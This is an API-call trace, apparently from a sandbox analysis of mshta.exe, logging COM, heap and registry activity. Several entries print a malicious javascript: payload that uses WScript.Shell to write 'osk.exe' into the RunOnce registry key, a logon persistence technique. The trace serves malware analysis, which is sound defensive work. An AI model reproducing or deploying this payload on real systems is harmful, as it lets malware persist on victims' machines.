[0069.829] NtdllDefWindowProc_W () returned 0x0 [0069.829] GetCurrentThreadId () returned 0x544 [0069.829] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x7ac938, hWnd=0x302a0, phIMC=0x33f5c4 | out: phIMC=0x33f5c4*=0xc010b) returned 0x0 [0069.829] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x7ac938, hWnd=0x302a0, hIME=0x0, phPrev=0x33f5c4 | out: phPrev=0x33f5c4*=0xc010b) returned 0x0 [0069.830] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x60) returned 0x7b3088 [0069.830] IConnectionPointContainer:FindConnectionPoint (in: This=0x7b3088, riid=0x758221c8*(Data1=0x3050f613, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x33f434 | out: ppCP=0x33f434*=0x7b30a8) returned 0x0 [0069.830] IConnectionPoint:Unadvise (This=0x7b30a8, dwCookie=0x7c2b60) returned 0x0 [0069.830] IUnknown:AddRef (This=0x7c2b60) returned 0x5 [0069.830] IUnknown:Release (This=0x7c2b60) returned 0x4 [0069.830] IUnknown:Release (This=0x7c2b60) returned 0x3 [0069.830] IUnknown:Release (This=0x7b30a8) returned 0x0 [0069.830] IUnknown:Release (This=0x7b3088) returned 0x0 [0069.830] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b3088 | out: hHeap=0x760000) returned 1 [0069.830] IUnknown:QueryInterface (in: This=0x7964dc, riid=0x758221d8*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x33f42c | out: ppvObject=0x33f42c*=0x7b3088) returned 0x0 [0069.830] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x60) returned 0x7b3088 [0069.830] IConnectionPointContainer:FindConnectionPoint (in: This=0x7b3088, riid=0x758221b8*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x33f430 | out: ppCP=0x33f430*=0x7b30b0) returned 0x0 [0069.830] IConnectionPoint:Unadvise (This=0x7b30b0, dwCookie=0x7c2b60) returned 0x0 
[0069.830] IUnknown:AddRef (This=0x7c2b60) returned 0x4 [0069.830] IUnknown:Release (This=0x7c2b60) returned 0x3 [0069.831] IUnknown:Release (This=0x7c2b60) returned 0x2 [0069.831] IUnknown:Release (This=0x7b30b0) returned 0x0 [0069.831] IUnknown:Release (This=0x7b3088) returned 0x0 [0069.831] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b3088 | out: hHeap=0x760000) returned 1 [0069.831] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a9138 | out: hHeap=0x760000) returned 1 [0069.831] IUnknown:Release (This=0x7964dc) returned 0x3 [0069.831] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a9108 | out: hHeap=0x760000) returned 1 [0069.831] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0069.832] GetMessageTime () returned 0 [0069.832] GetMessagePos () returned 0x0 [0069.832] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x33f2ac | out: plResult=0x33f2ac) returned 0x0 [0069.832] GetCurrentThreadId () returned 0x544 [0069.832] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0069.832] GetMessageTime () returned 0 [0069.832] GetMessagePos () returned 0x0 [0069.832] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x33f2ac | out: plResult=0x33f2ac) returned 0x0 [0069.833] GetCurrentThreadId () returned 0x544 [0069.833] IsOS (dwOS=0x25) returned 1 [0069.833] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f4b8 | out: phkResult=0x33f4b8*=0x210) returned 0x0 [0069.833] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f4bc | out: phkResult=0x33f4bc*=0x214) returned 0x0 [0069.833] RegOpenKeyExW (in: hKey=0x214, 
lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x33f478 | out: phkResult=0x33f478*=0x0) returned 0x2 [0069.833] RegOpenKeyExW (in: hKey=0x210, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x33f478 | out: phkResult=0x33f478*=0x218) returned 0x0 [0069.833] SHRegGetValueW () returned 0x0 [0069.833] RegCloseKey (hKey=0x218) returned 0x0 [0069.834] RegCloseKey (hKey=0x0) returned 0x6 [0069.834] RegCloseKey (hKey=0x0) returned 0x6 [0069.834] RegCloseKey (hKey=0x210) returned 0x0 [0069.834] RegCloseKey (hKey=0x214) returned 0x0 [0069.834] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x73710000 [0071.901] GetVersionExW (in: lpVersionInformation=0x33efc4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x33efc4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0071.901] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x73710000 [0071.902] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x33f540, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.903] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x33f5a0, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.904] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9108 [0071.904] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x33f58c, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.904] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x77da40, Size=0x48) returned 0x7b1450 [0071.904] ShowWindow (hWnd=0x302a0, nCmdShow=1) returned 1 [0071.904] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78ba60 | out: hHeap=0x760000) returned 1 [0071.904] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, 
wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0071.904] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0071.904] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0071.905] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc) returned 0x78ba60 [0071.905] RegisterDragDrop (hwnd=0x302a0, pDropTarget=0x750296cc) returned 0x0 [0071.906] GetCurrentThreadId () returned 0x544 [0071.906] GetCurrentThreadId () returned 0x544 [0071.906] GetCurrentThreadId () returned 0x544 [0071.906] GetCurrentThreadId () returned 0x544 [0071.906] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0071.906] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0071.906] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0071.907] IInternetProtocolRoot:Continue (This=0x7abedc, pProtocolData=0x77db20) returned 0x0 [0071.907] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1a) returned 0x7c4a98 [0071.907] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppu=0x33f5f8 | out: ppu=0x33f5f8) returned 0x0 [0071.907] IUnknown:QueryInterface (in: This=0x7a28c0, riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x33f4ec | out: ppvObject=0x33f4ec*=0x0) returned 0x80004002 [0071.907] IServiceProvider:QueryService (in: This=0x7a28c4, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x33f4ec | out: ppvObject=0x33f4ec*=0x79638c) 
returned 0x0 [0071.907] GetCurrentThreadId () returned 0x544 [0071.907] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f5a0 | out: phkResult=0x33f5a0*=0x244) returned 0x0 [0071.907] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f5a4 | out: phkResult=0x33f5a4*=0x248) returned 0x0 [0071.908] RegOpenKeyExW (in: hKey=0x248, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x33f560 | out: phkResult=0x33f560*=0x0) returned 0x2 [0071.908] RegOpenKeyExW (in: hKey=0x244, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x33f560 | out: phkResult=0x33f560*=0x0) returned 0x2 [0071.908] RegCloseKey (hKey=0x0) returned 0x6 [0071.908] RegCloseKey (hKey=0x0) returned 0x6 [0071.908] RegCloseKey (hKey=0x244) returned 0x0 [0071.908] RegCloseKey (hKey=0x248) returned 0x0 [0071.908] StrToIntW (lpSrc="7932560") returned 7932560 [0071.909] CoTaskMemFree (pv=0x77da40) [0071.909] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0071.909] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pdwZone=0x33f594, dwFlags=0x0 | out: pdwZone=0x33f594*=0xffffffff) returned 0x800c0011 [0071.909] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0071.909] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0071.909] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0071.909] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new 
ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwAction=0x1400, pPolicy=0x33f598, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x33f598*=0x0) returned 0x0 [0071.909] IUnknown:Release (This=0x78c78c) returned 0x3 [0071.910] CoCreateInstance (in: rclsid=0x33f54c*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74c495b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x33f508 | out: ppv=0x33f508*=0x2b50488) returned 0x0 [0072.921] malloc (_Size=0x80) returned 0x11d880 [0072.921] GetVersion () returned 0x1db10106 [0072.921] __dllonexit () returned 0x74a57ecf [0072.921] __dllonexit () returned 0x74a57e9b [0072.921] __dllonexit () returned 0x74a57eb5 [0072.921] __dllonexit () returned 0x74a57f70 [0072.975] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0072.976] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0072.976] EtwRegisterTraceGuidsA () returned 0x0 [0072.976] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0072.976] EtwRegisterTraceGuidsA () returned 0x0 [0072.976] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x33dec4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0072.977] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0072.977] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, 
phkResult=0x33dfe8 | out: phkResult=0x33dfe8*=0x0) returned 0x2 [0073.534] GetVersion () returned 0x1db10106 [0073.534] DllGetClassObject (in: rclsid=0x792350*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e7d4 | out: ppv=0x33e7d4*=0x11fe00) returned 0x0 [0073.534] ??2@YAPAXI@Z () returned 0x11fe00 [0073.535] JScriptEngine5:IClassFactory:CreateInstance (in: This=0x11fe00, pUnkOuter=0x0, riid=0x33f180*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x33e7c0 | out: ppvObject=0x33e7c0*=0x2b50488) returned 0x0 [0073.535] ??2@YAPAXI@Z () returned 0x2b50488 [0073.535] GetUserDefaultLCID () returned 0x409 [0073.535] GetACP () returned 0x4e4 [0073.535] JScriptEngine5:IUnknown:AddRef (This=0x2b50488) returned 0x2 [0073.535] JScriptEngine5:IUnknown:Release (This=0x2b50488) returned 0x1 [0073.535] JScriptEngine5:IUnknown:Release (This=0x11fe00) returned 0x0 [0073.535] ??3@YAXPAX@Z () returned 0x1 [0073.535] JScriptEngine5:IUnknown:QueryInterface (in: This=0x2b50488, riid=0x74c495b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x33f4ac | out: ppvObject=0x33f4ac*=0x2b50488) returned 0x0 [0073.535] JScriptEngine5:IUnknown:Release (This=0x2b50488) returned 0x1 [0073.536] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0073.536] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", 
pdwZone=0x33f41c, dwFlags=0x0 | out: pdwZone=0x33f41c*=0xffffffff) returned 0x800c0011 [0073.536] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0073.536] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0073.536] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0073.536] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwAction=0x1401, pPolicy=0x33f420, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x33f420*=0x0) returned 0x0 [0073.536] IUnknown:Release (This=0x78c78c) returned 0x3 [0073.536] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x54) returned 0x7c2e60 [0073.536] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7b90b8 [0073.536] GetCurrentThreadId () returned 0x544 [0073.536] ??2@YAPAXI@Z () returned 0x11fe00 [0073.536] GetCurrentThreadId () returned 0x544 [0073.537] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x33f348 | out: phkResult=0x33f348*=0x24c) returned 0x0 [0073.537] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0073.537] RegQueryValueExA (in: hKey=0x24c, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x33f33c, lpData=0x33f340, lpcbData=0x33f344*=0x4 | out: lpType=0x33f33c*=0x4, lpData=0x33f340*=0x1, lpcbData=0x33f344*=0x4) returned 0x0 [0073.537] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0073.537] RegCloseKey (hKey=0x24c) returned 0x0 [0073.538] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0073.538] GetProcAddress (hModule=0x76620000, 
lpProcName="CoGetObjectContext") returned 0x7666632b [0073.538] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0073.538] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0073.538] CoCreateInstance (in: rclsid=0x74a423a8*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74a423b8*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f344 | out: ppv=0x33f344*=0x76766460) returned 0x0 [0073.539] ??2@YAPAXI@Z () returned 0x11fe38 [0073.539] ??_U@YAPAXI@Z () returned 0x1113c0 [0073.539] ??2@YAPAXI@Z () returned 0x11fec8 [0073.539] ??2@YAPAXI@Z () returned 0x2b506a0 [0073.539] ??2@YAPAXI@Z () returned 0x11ff00 [0073.539] GetCurrentThreadId () returned 0x544 [0073.540] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x33f2e8, nSize=0x27 | out: lpBuffer="") returned 0x0 [0073.540] GetCurrentThreadId () returned 0x544 [0073.540] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0073.540] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x33f358, cchData=6 | out: lpLCData="1252") returned 5 [0073.540] IsValidCodePage (CodePage=0x4e4) returned 1 [0073.540] GetCurrentThreadId () returned 0x544 [0073.540] GetCurrentThreadId () returned 0x544 [0073.540] CoCreateInstance (in: rclsid=0x74a415ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74a415fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2b50674 | out: ppv=0x2b50674*=0x7b4480) returned 0x0 [0073.541] IUnknown:AddRef (This=0x7b4480) returned 0x2 [0073.541] GetCurrentProcessId () returned 0x7bc [0073.541] GetCurrentThreadId () 
returned 0x544 [0073.541] GetTickCount () returned 0x1148d23 [0073.541] ISystemDebugEventFire:BeginSession (This=0x7b4480, guidSourceID=0x74a416d4, strSessionName="JScript:00001980:00001348:18124067") returned 0x0 [0073.541] GetCurrentThreadId () returned 0x544 [0073.541] GetCurrentThreadId () returned 0x544 [0073.541] ??2@YAPAXI@Z () returned 0x11ff68 [0073.542] GetCurrentThreadId () returned 0x544 [0073.542] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0073.542] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x14) returned 0x7c3ba0 [0073.542] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f2b4 | out: ppv=0x33f2b4*=0x787518) returned 0x0 [0073.542] ??2@YAPAXI@Z () returned 0x11ffa0 [0073.542] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x76766460, pUnk=0x11ffa0, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x11ffbc | out: pdwCookie=0x11ffbc*=0x100) returned 0x0 [0073.542] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x11ffa0, riid=0x766597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33f238 | out: ppvObject=0x33f238*=0x0) returned 0x80004002 [0073.542] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x11ffa0, riid=0x76663e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33f228 | out: ppvObject=0x33f228*=0x0) returned 0x80004002 [0073.542] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x11ffa0) returned 0x2 [0073.543] IUnknown:AddRef (This=0x787518) returned 0x2 [0073.543] IUnknown:Release (This=0x787518) returned 0x1 [0073.543] ??2@YAPAXI@Z () returned 0x2b50998 [0073.543] GetTickCount () returned 
0x1148d23 [0073.543] ??2@YAPAXI@Z () returned 0x2b50fe8 [0073.543] malloc (_Size=0x40) returned 0x2b51058 [0073.543] malloc (_Size=0x104) returned 0x2b510a0 [0073.543] ??2@YAPAXI@Z () returned 0x11ffc8 [0073.543] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f2d0 | out: ppv=0x33f2d0*=0x787518) returned 0x0 [0073.543] IUnknown:Release (This=0x787518) returned 0x1 [0073.543] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f2d0 | out: ppv=0x33f2d0*=0x787518) returned 0x0 [0073.543] IUnknown:Release (This=0x787518) returned 0x1 [0073.544] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7b90d0 [0073.544] GetCurrentThreadId () returned 0x544 [0073.544] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x7b90e8 [0073.544] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x7c4c50 [0073.544] GetCurrentThreadId () returned 0x544 [0073.544] realloc (_Block=0x0, _Size=0xc8) returned 0x2b511b0 [0073.545] ??2@YAPAXI@Z () returned 0x2b51280 [0073.545] malloc (_Size=0x804) returned 0x2b512a8 [0073.545] ??2@YAPAXI@Z () returned 0x2b51ab8 [0073.545] malloc (_Size=0x104) returned 0x2b51c20 [0073.546] malloc (_Size=0x204) returned 0x2b51d30 [0073.547] malloc (_Size=0x404) returned 0x2b51f40 [0073.547] ??3@YAXPAX@Z () returned 0x1 [0073.547] malloc (_Size=0x40) returned 0x2b51ab8 [0073.547] malloc (_Size=0x804) returned 0x2b52350 [0073.548] realloc (_Block=0x2b51ab8, _Size=0x60) returned 0x2b51ab8 [0073.548] malloc (_Size=0x5b8) returned 0x2b52b60 [0073.549] ??2@YAPAXI@Z () returned 0x1113d0 [0073.549] free (_Block=0x2b512a8) [0073.549] ??3@YAXPAX@Z () returned 0x1 [0073.549] free (_Block=0x2b51ab8) [0073.549] free (_Block=0x2b52350) [0073.549] free (_Block=0x2b51f40) [0073.549] free 
(_Block=0x2b51d30) [0073.549] free (_Block=0x2b51c20) [0073.549] ??2@YAPAXI@Z () returned 0x2b53120 [0073.549] ??2@YAPAXI@Z () returned 0x2b53158 [0073.549] malloc (_Size=0xc) returned 0x2b53178 [0073.550] ??2@YAPAXI@Z () returned 0x2b53190 [0073.550] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3f0 | out: ppv=0x33f3f0*=0x787518) returned 0x0 [0073.550] IUnknown:Release (This=0x787518) returned 0x1 [0073.550] ??2@YAPAXI@Z () returned 0x2b531d8 [0073.550] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f440 | out: ppv=0x33f440*=0x787518) returned 0x0 [0073.550] IUnknown:Release (This=0x787518) returned 0x1 [0073.550] ??2@YAPAXI@Z () returned 0x2b53248 [0073.551] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0073.551] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f43c | out: ppv=0x33f43c*=0x787518) returned 0x0 [0073.551] IUnknown:Release (This=0x787518) returned 0x1 [0073.552] malloc (_Size=0x658) returned 0x2b532c8 [0073.552] GetCurrentThreadId () returned 0x544 [0073.552] GetCurrentThreadId () returned 0x544 [0073.553] GetCurrentThreadId () returned 0x544 [0073.553] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x24) returned 0x7a9198 [0073.554] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.554] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.600] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x30) returned 0x77da40 [0073.627] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x30c) returned 0x7c5e78 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3bc0 [0073.628] RtlAllocateHeap 
